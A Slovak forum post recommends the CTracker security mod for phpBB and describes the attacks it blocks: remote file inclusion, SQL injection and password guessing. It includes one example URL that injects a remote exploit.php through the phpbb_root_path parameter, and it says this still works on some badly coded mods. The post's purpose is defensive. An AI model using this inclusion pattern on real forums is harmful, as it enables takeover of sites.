Ctracker blokuje jednu dobrú vec a to takú, že v súboroch módov, ktoré su mimo phpBB a sú zle nakódené sa dá využiť premenná $phpbb_root_tath na hack fóra. Príklad.
Kód:
http://forum.sk/mojhack.php?phpbb_root_path=http://mojhostigng.sk/exploit.php
Bez problémov to išlo na starších verziách user class, casino hack a amatérskych hackoch to ide doteraz
Ctracker zablokuje do url dávať prípony exe, php atď...
Ďalej sa mi páči, že po zloom prihlásení treba opísať ten kód, takže vieš, kedy sa Ti niekto snažil uhádnuť heslo.
Všeobecne, CTracker blokuje rôzne MySQL Injectory, ktoré využívajú search.php v phpBB, poprípade iné módy, ktoré komunikujú s objemnejšími tabulkami v databázi.
Okrem prípon zakazuje dávať do URL alebo do POST rózne slová, ktoré by mohli byť nebezpečné a mohol by sa pomocou nich vykonať útok na fórum.
Má oerovanie súborov, či boli zmenené, takže si ľahko pomocou administrácie fóra zistíš, či má niekto okrem teba prístup na FTP, alebo Ti nejako zneužil napr Extreme styles na fóre, tzn, že sadostal do administrácie.
Má vlastný systém blokovania userov a IP adries, dokonca aj proxy, takže ak niekto našiel spôsob, ako to obísť cez v phpBB, tak tu má ďalší probém...
Ja osobne CTracker na fóre používam, ale je trochu upravený, aby v určitých poliach bral výnimky, lebo napríklad do predmetu témy nešlo napísať slovo casino a tak... Po miernych úpravách a nastaveniach je to veľmi dobrý mód
